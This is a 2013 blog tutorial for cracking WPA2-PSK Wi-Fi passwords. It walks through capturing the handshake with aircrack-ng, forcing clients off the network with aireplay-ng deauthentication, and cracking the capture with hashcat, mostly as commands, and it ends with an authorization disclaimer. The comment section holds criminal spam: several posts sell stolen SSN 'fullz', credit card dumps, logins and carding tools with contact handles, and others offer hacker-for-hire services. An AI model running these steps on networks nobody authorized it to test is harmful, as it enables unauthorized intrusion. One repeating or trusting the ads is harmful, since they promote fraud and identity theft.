Saturday, June 8, 2013

GPU-assisted cracking WPA2-PSK passwords with aircrack-ng and oclHashCat

In order to crack a WPA2-PSK password, there are two main steps you need to take:

Step 1 is to capture the WPA2 handshake with aircrack-ng. I took the instructions here: http://www.aircrack-ng.org/doku.php?id=cracking_wpa and I'm using the mac80211 drivers, if you have a different setup you'll need to consult the aircrack tutorial accordingly.
Step 2 is to crack the password hash with a GPU-enabled cracking tool such as aircrack-ng or oclHashCat. In this tutorial I use oclHashCat.

Step 1: I used a Raspberry Pi running Kali Linux to capture the WPA2 handshake:

  • Pro-tip: Bring your wireless interface down first otherwise you'll have trouble changing the channel! 
    • ifconfig wlan0 down
  • Start the capture interface (in order to change the channel to match the channel used by your target you need to specify the frequency here rather than the channel number, at least I did):
    • airmon-ng start wlan0 2462
  • Capture the handshake (wait until you see the "WPA Handshake" text appear):
    • airodump-ng --channel 11 --bssid <mac_addr> -w psk mon0
    • If you have problems with the channel, you may need to run airodump like: airodump-ng --channel 11,11 --bssid <mac_addr> -w psk mon0
  • Optional: deauthenticate the wireless client to force it to reauthenticate so you can capture the handshake:
    • aireplay-ng -0 1 -a <access_point_address> -c <mac_addr_to_deauthenticate> mon0

  •  If you have problems with the "fixed channel -1" message in airodump, you may need to run aireplay like this: 
    • aireplay-ng -0 1 -a  <access_point_address> -c <mac_addr_to_deauthenticate> --ignore-negative-one -e <essid_name> mon0 
  • Grab a decent wordlist as  this is really the key to the whole password cracking endeavour, without a decent wordlist you're going nowhere. Keep in mind that passwords may be language specific, so the standard wordlists might not help you if you're not in an English speaking country, for example. A good place to start is the Aircrack FAQ: http://www.aircrack-ng.org/doku.php?id=faq
  • Optional: Crack the key with vanilla aircrack, that is, without GPU support:
    • aircrack-ng -w <wordlist> -b <mac_addr> psk*.cap


Step 2: For GPU cracking you need to use oclHashCat (or compile the SVN version of aircrack-ng from source). I did this on an Ubuntu 13.04 machine with an NVIDIA graphics card using the NVDIA binary drivers which you may need to install if you're using Noveau. If you have an AMD/ATI card, you'll need the Catalyst drivers installed. So you need to transfer your .cap files over from your capture machine to your GPU cracking machine if necessary.
Pro tip: there are two main versions of HashCat (aside from the standard 32/64 bit versions):
  1. oclHashCat for AMD/ATI graphics cards
  2. cudaHashCat for NVIDIA graphics cards
Then do the following steps:
  • Grab oclHashcat from here: 
    • http://hashcat.net/files/oclHashcat-plus-0.14.7z
  • Extract it with  
    • 7z x oclHashcat-plus-0.14.7z (don't use 7x e as it will not preserve the directory structure correctly when extracting and hashcat won't work)
  • Optional: install the NVIDIA CUDA packages:
    • sudo apt-get install nvidia-cuda-*
  • Since the version of aircrack-ng that ships with Kali Linux does not support the -J flag (which creates a hashcat capture file from the WPA handshake capture which aircrack-ng uses by default), you need to grab the latest version of aircrack-ng from here: http://download.aircrack-ng.org/aircrack-ng-1.2-beta1.tar.gz 
  • Extract: 
    • tar zxvf aircrack-ng-1.2-beta1.tar.gz
  • Make sure you have the appropriate support tools installed:  
    • sudo apt-get install build-essential libssl-dev libsqlite3-dev
  • Build:
    • make (optional: make install)
  • Once you have built the binary, convert the WPA2 handshake capture to a hashcat file with:
    •  aircrack-ng psk-01.cap -J <name_of_your_hashcat_capture_file>
  • Run hashcat against your new capture file (choose the version of hashcat that machines your CPU architecture and your graphics card):
    • cudaHashcat-plus32.bin -m 2500 <filename>.hccap <wordlist>
  • Enjoy your crispy new password! :-)
Obviously: only use these tools against a network that you are authorized to assess!

22 comments:

  1. Replies
    1. Phreaklets: Gpu-Assisted Cracking Wpa2-Psk Passwords With Aircrack-Ng And Oclhashcat >>>>> Download Now

      >>>>> Download Full

      Phreaklets: Gpu-Assisted Cracking Wpa2-Psk Passwords With Aircrack-Ng And Oclhashcat >>>>> Download LINK

      >>>>> Download Now

      Phreaklets: Gpu-Assisted Cracking Wpa2-Psk Passwords With Aircrack-Ng And Oclhashcat >>>>> Download Full

      >>>>> Download LINK mS

      Delete
    2. Hello Everyone

      Selling SSN DOB Fullz in bulk
      DL & work history will be include (if needed)
      High Credit Scores USA Fullz/Pros

      USA/UK/Canada CC Fullz also available
      Dumps Tutorials & Dumps with pin codes available (101 & 202)
      Business Fullz with EIN
      Office365 Logs in bulk

      Here I'm

      TG/ICQ = @killhacks
      WA = +92 317 2721122
      Emails = exploit dot tools4u at gmail dot com
      Wickr = peeterhacks

      Hacking, Spamming, Carding Stuff also available
      Tools with tutorials & Ebooks
      Mailers/Brutes/Viruses
      Kali Linux Full course
      D**P/D**k web Courses with Legit Links
      Combos/logs/I.P's/Proxies

      Legit & Genuine Tools

      Emails = exploit dot tools4u at gmail dot com
      Wickr = peeterhacks
      TG/ICQ = @killhacks
      WA = +92 317 2721122

      Delete
  2. You didnt say anything about how to use oclHash..

    ReplyDelete
    Replies
    1. This comment has been removed by the author.

      Delete
    2. I assume the commands are the same (just replace cudahashcat with oclhashcat)

      Delete

  3. Sometimes it is difficult to manage airodump-ng output files. i mean once i generate those csv and xml files then after i start looking into it so for large amount of data i can't figure it out. so is there any tools or services available for analysis and visualization ? i have used this website and it is quite

    good, here i have shared my sample data have a look and also share any other sources if anyone knows. - http://bit.ly/1Nbfgm6

    ReplyDelete
  4. http://docs.kali.org/general-use/install-nvidia-drivers-on-kali-linux

    ReplyDelete
  5. CONTACT: cyberwizard_hacker@outlook.com or you can what app +1 646 396 3787
    -Find Out If Your Husband/Wife or Boyfriend/Girlfriend Is Cheating On You
    -Let Us Help You Hack Any Website Or Database
    -Hack Into Any University Portal; To Change Your Grades Or Upgrade Any Personal Information/Examination Questions
    -Hack Email; Mobile Phones; Whatsapp; Text Messages; Call Logs; Facebook And Other Social Media Accounts
    -And All Related Services
    ReputableHacker Will Get The Job Done For You
    cyberwizard_hacker@outlook.com
    TESTED AND TRUSTED!!!

    ReplyDelete
  6. verifiedprohackers@gmail.com thank you so much for the iPhone 12 Pro max hack without trace

    ReplyDelete
  7. Phreaklets: Gpu-Assisted Cracking Wpa2-Psk Passwords With Aircrack-Ng And Oclhashcat >>>>> Download Now

    >>>>> Download Full

    Phreaklets: Gpu-Assisted Cracking Wpa2-Psk Passwords With Aircrack-Ng And Oclhashcat >>>>> Download LINK

    >>>>> Download Now

    Phreaklets: Gpu-Assisted Cracking Wpa2-Psk Passwords With Aircrack-Ng And Oclhashcat >>>>> Download Full

    >>>>> Download LINK Y1

    ReplyDelete
  8. Learn all about community services from experts and fare well in your course.
    People have lived in communities since they first moved to the city.
    When people from various cultural and economic backgrounds come together, they form a community.
    It's a new form of social structure, and there are a variety of community services aimed to make people's lives easier.
    Diploma Of Community Services is a programme for students in Australia who are interested in sociology and want to learn more about the social structure.
    It is a specialist course that teaches students about the function of social housing professionals, who do case management and work to provide community services to individuals in communities all around the world.
    Do you require assistance in comprehending community service assignments?
    The biggest issue kids confront when working late on academics is that they have no one to help them if they get stuck.

    This is why SourceEssay provides students with assignment assistance.
    SourceEssay ensures that all students, regardless of socioeconomic level, receive equal assistance and opportunities to complete their projects from online tutors.
    SourceEssay can help you with your homework right now.
    Make sure your academic career is a huge success!
    Every assignment is meticulously produced, double-checked by subject matter experts, and handed to students on time.
    We can help you understand the core principles of this subject and get good grades on your homework.
    Professionals from SourceEssay can supply you with all of the information you require right now!
    They offer a team of highly qualified specialists available to assist students 24 hours a day, 7 days a week via chat, phone, and email.
    Become a participant in the Childhood Education and Care Assignment.
    Get writing assistance 24 hours a day, seven days a week.
    Diploma Of Community Services Assignment Help is now available from SourceEssay experts.
    We make sure you can reach out to subject matter experts at any time and have your case management assignments double-checked before submitting them.
    It boosts your chances of succeeding in the subject.
    We also supply you with plenty of study materials to assist you improve your case management knowledge so that you may develop an interest in the subject and write high-quality informative assignments.
    For immediate assistance, contact the pros at SourceEssay.

    ReplyDelete
  9. Become a participant in the Childhood Education and Care Assignment. Get Childhood Education and Care Assignment Help 24 hours a day, seven days a week.

    ReplyDelete
  10. Hello Everyone

    Selling SSN DOB Fullz in bulk
    DL & work history will be include (if needed)
    High Credit Scores USA Fullz/Pros

    USA/UK/Canada CC Fullz also available
    Dumps Tutorials & Dumps with pin codes available (101 & 202)
    Business Fullz with EIN
    Office365 Logs in bulk

    Here I'm

    TG/ICQ = @killhacks
    WA = +92 317 2721122
    Emails = exploit dot tools4u at gmail dot com
    Wickr = peeterhacks

    Hacking, Spamming, Carding Stuff also available
    Tools with tutorials & Ebooks
    Mailers/Brutes/Viruses
    Kali Linux Full course
    D**P/D**k web Courses with Legit Links
    Combos/logs/I.P's/Proxies

    Legit & Genuine Tools

    Emails = exploit dot tools4u at gmail dot com
    Wickr = peeterhacks
    TG/ICQ = @killhacks
    WA = +92 317 2721122

    ReplyDelete